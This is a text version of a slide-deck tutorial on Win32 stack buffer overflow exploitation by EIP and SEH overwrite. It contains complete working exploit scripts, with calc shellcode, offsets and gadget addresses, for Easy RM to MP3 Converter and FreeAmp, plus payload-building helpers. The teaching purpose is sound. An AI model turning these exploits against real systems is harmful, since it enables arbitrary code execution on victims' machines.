system hacking tutorial #2 - buffer overflow - overwrite eip

System Hacking & Reverse Engineering documented by h2spice [email protected] [ Buffer Overflow - Overwrite EIP ]

Upload: sang-hwan-ahn

Post on 12-Jul-2015



Who am I

Sanghwan Ahn (h2spice)

Works for LINE Corp.

Carries out vulnerability research (exploitation, hunting, analysis)

Curriculum Overview

System Hacking / Reversing

  Vulnerability principles
    Buffer Overflow
    Format String Bug
    Stack Overflow
    Use After Free
    Heap Overflow

  Exploitation (Win32 / *NIX / ARM)
    Overwriting RET
    Egg Hunting
    Overwriting SEH
    RTL
    ROP
    Heap Spraying
    Overwriting .dtors
    Overwriting GOT

  Vulnerability / Malware Analysis
    Malware analysis
    Bug hunting (x86, ARM)
    Vulnerability analysis (software on x86, mobile)
    Source code analysis
    Fuzzing
    CVE-XXXX-XXXX
    Exploit-DB, Inj3ct0r (1337day)

  Reverse Engineering
    iOS
    Android

Table of Contents

Track3 - Exploitation
  Introduction
  Track3-1 Win32
    Overwrite RET
    Overwrite SEH
    Egg-Hunting
    ROP
    Heap Spray
  Track3-2 *NIX
    Overwrite RET
    RTL
    Overwrite .dtors
    Overwrite GOT
  Track3-3 ARM
    Overwrite RET
    RTL
    ROP

Track3. Exploitation


What is Exploitation?

Exploitation refers to a procedure, sequence of commands, script, program or specific piece of data crafted to take advantage of a bug, security vulnerability or other design flaw in computer software, hardware or computer-related electronic equipment in order to make it carry out the behaviour the attacker intends; the term also covers the act of attacking with such things.

Exploitation begins at the point where the attacker is able to control the target's control flow.

An exploit is usually made up of code that triggers the vulnerability through a specific bug, code that bypasses particular security mechanisms, and code that performs the malicious action.


Overwrite RET (Return Address)

Uses a stack buffer overflow vulnerability: data larger than the buffer allocated on the stack (attack code included) is written into it, overwriting the saved return address with the address of the attack code, so that arbitrary code runs when the function returns.


How do you fly to shellcode? (ways of reaching the shell code)

jmp (or call) [register]: if a register holds the address of the shell code, overwrite the return address with the address of a jmp [register] or call [register] instruction; when it executes, EIP is loaded with the shell code address.

pop return: if the address of the shell code is not in a register but lies on the stack, overwrite EIP with the address of a pop/ret or pop/pop/ret sequence (the number of pops depends on how deep in the stack the pointer sits); the final ret loads the shell code address.

push return: similar to jmp (or call) [register]. If the attacker cannot find a jmp (or call) [register] instruction anywhere, a push [register]; ret sequence pushes the register's value onto the stack and the ret loads it into EIP.

jmp [register + offset]: if a register points into the buffer that holds the shell code but not at its start, add the number of bytes needed to reach the shell code and use a jmp [register + offset] instruction.

SEH (Error Handler): every program gets a default exception handler from the OS. So even if the software itself does not use exception handling, an attacker can overwrite the SEH handler with an address of their choosing and have it load the shell code.
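All five techniques above depend on finding the right instruction bytes at a fixed address in some loaded module. The Python script below is an added example, not code from the slides: it scans a byte blob for the encodings those techniques need (jmp reg and call reg, push reg; ret, and pop/pop/ret with either ret or ret n) and filters candidate addresses for bad bytes, which is the search that !mona jmp -r esp and !mona seh perform. SAMPLE_TEXT and IMAGE_BASE are constructed stand-ins for a module's .text section and its load address; in practice you feed it the section bytes of a module without ASLR and SafeSEH.

```python
import re
import struct

# Register numbering used in x86 ModRM / opcode encodings: eax=0 ... edi=7
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def jump_encodings(reg):
    """Byte patterns that transfer EIP to the address held in `reg`:
    jmp reg  = FF /4 with mod=11 -> FF E0+r
    call reg = FF /2 with mod=11 -> FF D0+r
    push reg; ret = (50+r) C3"""
    r = REGS.index(reg)
    return {
        "jmp " + reg: bytes([0xFF, 0xE0 | r]),
        "call " + reg: bytes([0xFF, 0xD0 | r]),
        "push %s; ret" % reg: bytes([0x50 | r, 0xC3]),
    }


def find_jumps(blob, reg, base=0):
    """All (address, mnemonic) pairs in `blob` that jump or call through `reg`.
    `base` is the address the blob is mapped at, so results are usable as-is."""
    hits = []
    for mnemonic, enc in jump_encodings(reg).items():
        start = 0
        while True:
            i = blob.find(enc, start)
            if i < 0:
                break
            hits.append((base + i, mnemonic))
            start = i + 1
    return sorted(hits)


# pop r32 is 58+r; pop esp (5C) is left out because it would move the stack
# pointer before the ret. ret is C3, ret imm16 is C2 xx xx. The lookahead
# makes the search overlapping, so every pop/pop/ret in a run of pops is found.
POP_POP_RET = re.compile(
    rb"(?=([\x58-\x5b\x5d-\x5f][\x58-\x5b\x5d-\x5f](?:\xc3|\xc2..)))", re.DOTALL)


def find_pop_pop_ret(blob, base=0):
    """All (address, 'pop X; pop Y; ret[ n]') sequences in `blob` (the SEH gadget)."""
    hits = []
    for m in POP_POP_RET.finditer(blob):
        seq = m.group(1)
        text = "pop %s; pop %s; ret" % (REGS[seq[0] - 0x58], REGS[seq[1] - 0x58])
        if seq[2] == 0xC2:
            text += " 0x%x" % struct.unpack_from("<H", seq, 3)[0]
        hits.append((base + m.start(), text))
    return hits


def usable(address, badchars=b"\x00\x0a\x0d"):
    """True if the little-endian bytes of `address` avoid the characters the
    input path rejects (NUL for C strings, CR/LF for line-based playlists)."""
    return not any(b in badchars for b in struct.pack("<I", address))


# Constructed stand-in for a module's .text section (not code from any real DLL).
IMAGE_BASE = 0x10000000
SAMPLE_TEXT = (
    b"\x55\x8b\xec\x83\xec\x0c"   # push ebp; mov ebp,esp; sub esp,0xC  (offset 0)
    b"\xff\xe4"                   # jmp esp                             (offset 6)
    b"\x90\x90"                   # nop; nop
    b"\x5e\x5b\xc3"               # pop esi; pop ebx; ret               (offset 10)
    b"\x54\xc3"                   # push esp; ret                       (offset 13)
    b"\x5f\x5e\xc2\x04\x00"       # pop edi; pop esi; ret 4             (offset 15)
    b"\xff\xd4"                   # call esp                            (offset 20)
)

if __name__ == "__main__":
    for addr, text in find_jumps(SAMPLE_TEXT, "esp", IMAGE_BASE):
        print("0x%08x  %-26s usable=%s" % (addr, text, usable(addr)))
    for addr, text in find_pop_pop_ret(SAMPLE_TEXT, IMAGE_BASE):
        print("0x%08x  %-26s usable=%s" % (addr, text, usable(addr)))
```

The bad-byte filter is the step people skip: a gadget whose address contains 0x00 survives a length-based copy but not a strcpy, and one containing 0x0A or 0x0D never survives a line-oriented playlist parser.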


Overwrite RET

  Stack frame of .Start (high address at the top):

    arg2
    arg1
    &ret (saved eip)
    saved ebp
    char buf[8]

  Calling .Start function:
  .Start:
      push %ebp
      mov  %esp, %ebp
      sub  $0xC, %esp
      ...
      strcpy(buf, argv[1]);
      ...
      leave
      ret

  Writing direction: strcpy fills buf from the low address upward. A normal
  argument such as "Hello\n" fits inside buf[8] (it appears in memory as the
  dwords "lleH" and "\nwo", little-endian).

  With an argument of 24 'A's (AAAA x 6 dwords) the copy runs past buf[8],
  over the saved ebp and the saved return address and into arg1 and arg2.

  Replace the dword that lands on &ret with the Target Address (to Shell Code):
  when .Start executes ret, EIP is loaded with that address.

  Final layout:

    &ret (saved eip)   <- &buf (the address of the shell code)
    saved ebp          <- Padding
    char buf[8]        <- S h e l l C o d e


Exercise Time :D

Target Info
  Win32
  Easy RM to MP3 Converter v.2.7.3.700
  Download Link is (http://outofcontrol.co.kr/vulnApp/EasyRM.zip)

Vulnerability Type
  Buffer Overflow (Stack Based) by Parsing Playlist


Exercise Time :D

Tip
  Generate Pattern by using mona plugin (!mona pattern_create 30000)
  nop sleds (0x90 * N)
  Shell code (windows/exec calc.exe):

"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . "\x7f\xe8\x7b\xca";


Exercise Time :D

Exploit Info
  .m3u Playlist File Format
  length of junk data is 26037
  gadget is 0x7608fcfe (jmp esp from MSRMCcodec02.dll)
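Exploit Info gives the two numbers the RET overwrite needs: the distance to the saved return address (26037) and a jmp esp address (0x7608fcfe). The script below is an added worked example, not the slides' own code: pattern_create and pattern_offset reimplement what !mona pattern_create / !mona pattern_offset do, eip_at_crash shows what the debugger displays when the pattern lands on EIP, and build_ret_payload lays out junk + return address + nop sled + shellcode and checks that the return address sits exactly at the offset. The calc shellcode is replaced by a constructed placeholder (FAKE_SHELLCODE). One caveat the code makes visible: the cyclic pattern repeats every 20280 bytes (26 * 26 * 10 * 3), so in a 30000-byte pattern the four bytes found at 26037 also occur at 5757, and the search reports both offsets; picking the first one blindly would put the return address in the wrong place.

```python
import itertools
import string
import struct

PERIOD = 26 * 26 * 10 * 3   # 20280 bytes before the Metasploit-style pattern repeats


def pattern_create(length):
    """Cyclic pattern in the Metasploit / mona style: triples Aa0, Aa1, ..., Zz9,
    cycled until `length` bytes have been produced."""
    triples = itertools.cycle(
        (u + l + d).encode()
        for u, l, d in itertools.product(string.ascii_uppercase,
                                         string.ascii_lowercase,
                                         string.digits))
    return b"".join(itertools.islice(triples, (length + 2) // 3))[:length]


def pattern_offset(value, length=30000):
    """All offsets at which `value` occurs in a pattern of `length` bytes.
    `value` is either the 4 bytes seen in memory or the integer the debugger
    shows in EIP (those bytes read little-endian)."""
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    pat = pattern_create(length)
    hits, start = [], 0
    while True:
        i = pat.find(needle, start)
        if i < 0:
            return hits
        hits.append(i)
        start = i + 1


def eip_at_crash(pattern, offset):
    """Value a 32-bit debugger shows in EIP after the saved return address was
    overwritten with pattern[offset:offset + 4]."""
    return struct.unpack_from("<I", pattern, offset)[0]


def build_ret_payload(offset, ret_addr, shellcode, nop_len=25, total_len=None):
    """junk | ret_addr (little-endian) | nop sled | shellcode [| padding].
    After the function's ret, esp points at the nop sled, so a jmp esp placed
    at ret_addr slides into the shellcode."""
    payload = (b"A" * offset
               + struct.pack("<I", ret_addr)
               + b"\x90" * nop_len
               + shellcode)
    if total_len is not None and len(payload) < total_len:
        payload += b"A" * (total_len - len(payload))
    assert payload[offset:offset + 4] == struct.pack("<I", ret_addr)
    return payload


def write_m3u(path, payload):
    """The slides' trigger: the payload is the whole playlist entry."""
    with open(path, "wb") as f:
        f.write(payload)


# Numbers from the slides: offset 26037, jmp esp in MSRMCcodec02.dll at 0x7608fcfe.
OFFSET, JMP_ESP = 26037, 0x7608fcfe
FAKE_SHELLCODE = b"\xcc" * 144   # constructed stand-in (int3 x 144), not the calc shellcode

if __name__ == "__main__":
    pat = pattern_create(30000)
    eip = eip_at_crash(pat, OFFSET)
    print("EIP after the crash: 0x%08x, found at offsets %s" % (eip, pattern_offset(eip)))
    write_m3u("exploit.m3u", build_ret_payload(OFFSET, JMP_ESP, FAKE_SHELLCODE))
```

When pattern_offset returns more than one candidate, confirm the right one by crashing again with a payload whose return-address slot holds a recognisable value (for example 0x42424242) at each candidate offset in turn.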


Exercise Time :D

Exploit Code (exploit.pl)

#!/usr/bin/perl
# Easy RM to MP3 Converter 2.7.3.700 - .m3u stack buffer overflow, overwrite RET
use strict;
use warnings;

my $file = "exploit.m3u";

my $junk = "A" x 26037;               # junk up to the saved return address
my $eip  = pack('V', 0x7608fcfe);      # jmp esp from MSRMCcodec02.dll, little-endian

my $shellcode = "\x90" x 25;          # nop sled; esp points here after the ret

# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode .
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";

open(my $FILE, '>', $file) or die "Cannot open $file: $!";
binmode($FILE);                       # no newline translation on Windows
print $FILE $junk . $eip . $shellcode;
close($FILE);
print "m3u File Created successfully\n";


Overwrite SEH (Error Handler)

Structured Exception Handler (SEH)
  The exception handling mechanism provided by Windows
  Uses exception handlers


Exception Handler

An exception handler is a piece of code inside the application whose purpose is to deal with exceptions the application raises (the general exception-handling mechanism looks like this):

try { // run stuff. if an exception occurs, go to <catch> code }

catch { // run stuff when exception occurs }


Exception Handler

  Stack (high address at the top):

    Exception Handler
    Arguments
    Return Address
    Stack Frame Pointer
    Local Variables (buffer area)

An exception handler record holds two pointers:

  a pointer to the next exception handler record
  a pointer to the actual address of the exception handler (the SE handler)

  Exception Handler record:
    Next Exception Handler Address
    Exception Handler Address


Exception Handler chain

  Occurs Exception
       |
       v
  Exception Handler #1   Next Exception Handler Address | Exception Handler Address
       |
       v
  Exception Handler #2   Next Exception Handler Address | Exception Handler Address
       |
       v
  Exception Handler #3   Next Exception Handler Address | Exception Handler Address
       |
       v
  MSVCRT!exhandler       0xFFFFFFFF (end of chain)      | Exception Handler Address
       |
       v
  Terminated


Overwrite SEH

  Stack (high address at the top):

    pointer to next SEH record
    pointer to SEH Handler
    Arguments
    Return Address
    Stack Frame Pointer
    Local Variables (buffer area)

  Calling .Start function:
  .Start:
      push %ebp
      mov  %esp, %ebp
      sub  $0xC, %esp
      ...
      strcpy(buf, argv[1]);
      ...
      leave
      ret

  Writing direction: the copy fills the buffer area from the low address
  upward. A long enough run of 'A's (AAAA x N dwords) passes the local
  variables, the stack frame pointer, the return address and the arguments
  and reaches the SEH record: first the pointer to the next SEH record, then
  the pointer to the SEH handler.

  Final layout, in writing order:

    A A A A ... A A A A    junk up to the SEH record
    jmp to shellcode       over the pointer to the next SEH record (nSEH)
    pop/pop/ret            over the pointer to the SEH handler
    Padding                nop sled
    S h e l l C o d e

  When an exception is raised, the dispatcher calls the overwritten handler:
  pop/pop/ret returns into nSEH, and the jmp there lands in the padding in
  front of the shell code.


Exercise Time :D

Target Info
  Win32
  FreeAMP Audio Player v.2.0.7
  Download Link is (http://outofcontrol.co.kr/vulnApp/FreeAmp.zip)

Vulnerability Type
  Buffer Overflow (Stack Based) by Parsing Playlist


Exercise Time :D

Tip
  Generate Pattern by using mona plugin (!mona pattern_create 30000 / !mona seh)
  nop sleds (0x90 * N)
  Shell code (windows/exec calc.exe):

"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" . "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" . "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" . "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" . "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" . "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" . "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" . "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" . "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" . "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" . "\x7f\xe8\x7b\xca";


Exercise Time :D

Exploit Info
  .pls Playlist File Format
  length of junk data is 893
  gadget is 0x004027BF (pop/pop/ret from freeamp.exe)
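The Overwrite SEH layout slide and the Exploit Info above fix the three pieces of the FreeAmp payload: 893 bytes of junk up to the SEH record, a 4-byte nSEH holding a short jump, and the pop/pop/ret at 0x004027BF in the handler slot. The script below is an added example, not the original exploit: it encodes the short jump from a requested distance instead of hard-coding EB 08, assembles the record, and then replays what the exception dispatcher does (call the handler; pop/pop/ret returns into nSEH; the jump moves EIP) to confirm that execution lands inside the nop sled. It also reports that 0x004027BF contains a 0x00 byte; whether that matters depends on how the playlist entry is copied, and the slides' exploit uses the address unchanged. The calc shellcode is replaced by a constructed placeholder (FAKE_SHELLCODE).

```python
import struct

# Numbers from the slides' Exploit Info for FreeAmp 2.0.7 (.pls)
JUNK_LEN = 893             # bytes before the SEH record is reached
POP_POP_RET = 0x004027BF   # pop/pop/ret inside freeamp.exe
NOP_LEN = 20
TOTAL_LEN = 30000
FAKE_SHELLCODE = b"\xcc" * 144   # constructed stand-in (int3 x 144), not the calc shellcode


def short_jmp(distance):
    """Encode 'jmp short rel8' (EB xx). The displacement is measured from the
    end of the 2-byte instruction, so EB 08 skips the 8 bytes after it."""
    if not -128 <= distance <= 127:
        raise ValueError("short jmp reaches -128..127 only, got %d" % distance)
    return b"\xeb" + struct.pack("<b", distance)


def seh_record(handler, skip=8):
    """The 8-byte overwrite of the SEH record: nSEH = short jmp padded with nops,
    SEH = handler address. skip=8 clears the 2 nop bytes and the 4-byte handler
    and lands 2 bytes into whatever follows (the nop sled)."""
    return short_jmp(skip) + b"\x90\x90" + struct.pack("<I", handler)


def bad_bytes(address, badchars=b"\x00\x0a\x0d"):
    """Bytes of the little-endian address that a string copy or a line-based
    parser may refuse. 0x004027BF ends in 0x00, so this returns [0] for it."""
    return [b for b in struct.pack("<I", address) if b in badchars]


def build_seh_payload(junk_len=JUNK_LEN, handler=POP_POP_RET, shellcode=FAKE_SHELLCODE,
                      nop_len=NOP_LEN, total_len=TOTAL_LEN):
    """junk | nSEH | SEH | nop sled | shellcode | padding (to force the exception)."""
    payload = b"A" * junk_len + seh_record(handler) + b"\x90" * nop_len + shellcode
    payload += b"A" * max(0, total_len - len(payload))
    return payload


def sled_bounds(junk_len=JUNK_LEN, nop_len=NOP_LEN):
    """[start, end) of the nop sled inside the payload."""
    start = junk_len + 8
    return start, start + nop_len


def simulate_dispatch(payload, junk_len=JUNK_LEN):
    """Replay what happens once the exception fires: the dispatcher calls the
    address in the SEH slot; pop/pop/ret there returns to the nSEH slot (the
    record address is the second handler argument, third dword on the stack);
    the short jmp in nSEH then sets EIP. Returns (handler, landing_offset)
    with the landing offset relative to the start of the payload."""
    nseh = junk_len
    handler = struct.unpack_from("<I", payload, nseh + 4)[0]
    if payload[nseh] != 0xEB:
        raise ValueError("nSEH does not start with a short jmp")
    rel8 = struct.unpack_from("<b", payload, nseh + 1)[0]
    return handler, nseh + 2 + rel8


def build_pls(payload):
    """Wrap the payload in the .pls playlist the slides use as the trigger."""
    return (b"[playlist]\n"
            b"File1=http://" + payload + b"\n"
            b"NumberOfEntries=1\n"
            b"Version=2\n")


if __name__ == "__main__":
    payload = build_seh_payload()
    handler, landing = simulate_dispatch(payload)
    lo, hi = sled_bounds()
    print("handler 0x%08x, bad bytes %s" % (handler, bad_bytes(handler)))
    print("jmp lands at %d, sled is [%d, %d): %s" % (landing, lo, hi, lo <= landing < hi))
    with open("Exploit.pls", "wb") as f:
        f.write(build_pls(payload))
```

The short jump is the fragile part: if you insert anything between the handler address and the sled, recompute the distance rather than keeping EB 08, and switch to a longer jump if the sled has to sit more than 127 bytes away.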


Exercise Time :D

Exploit Code (exploit.py)

#!/usr/bin/python
# FreeAmp 2.0.7 .pls stack buffer overflow, overwrite SEH
from struct import pack
from time import sleep

print('''
FreeAmp 2.0.7 .PLS File Buffer Overflow Exploit by h2spice
''')

# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
shellcode = (b"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" +
             b"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" +
             b"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" +
             b"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" +
             b"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" +
             b"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" +
             b"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" +
             b"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" +
             b"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" +
             b"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" +
             b"\x7f\xe8\x7b\xca")

buf  = b"\x41" * 893                   # junk up to the SEH record
buf += b"\xeb\x08\x90\x90"             # nSEH: short jmp +8 over the handler address into the nop sled
buf += pack('<L', 0x004027BF)          # SEH: pop/pop/ret from freeamp.exe
buf += b"\x90" * 20                    # nop sled
buf += shellcode
buf += b"\x41" * (30000 - len(buf))    # pad so the overflow raises the exception

exploit = (b"[playlist]\n"
           b"File1=http://" + buf + b"\n"
           b"NumberOfEntries=1\n"
           b"Version=2\n")

print("\t\t[+]Creating File Exploit.pls...")
sleep(1)
try:
    with open("Exploit.pls", "wb") as f:
        f.write(exploit)
    print("\t\t[+]File Exploit.pls Created.")
    sleep(2)
except OSError:
    print("\t\t[-]Error in Create file Exploit.pls")
    sleep(1)


Thank You :)

See you the week after next.